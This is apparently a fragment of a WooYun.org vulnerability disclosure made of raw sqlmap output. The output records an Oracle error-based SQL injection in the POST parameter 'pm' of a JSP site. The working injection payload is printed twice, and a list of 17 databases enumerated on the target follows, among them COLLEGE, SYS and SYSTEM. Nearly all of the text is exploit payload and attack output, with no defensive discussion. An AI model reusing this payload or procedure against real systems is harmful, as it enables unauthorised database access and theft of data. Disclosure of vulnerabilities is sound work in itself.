WooYun.org

Place: POST
Parameter: pm
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: pm=444' AND 9230=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(121)||CHR(113)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (9230=9230) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(111)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) AND 'JQYy' LIKE 'JQYy&flid=0
---
web application technology: Nginx, JSP
back-end DBMS: Oracle
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: pm
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: pm=444' AND 9230=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(121)||CHR(113)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (9230=9230) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(111)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) AND 'JQYy' LIKE 'JQYy&flid=0
---
web application technology: Nginx, JSP
back-end DBMS: Oracle
available databases [17]:
[*] COLLEGE
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXCHANGE
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB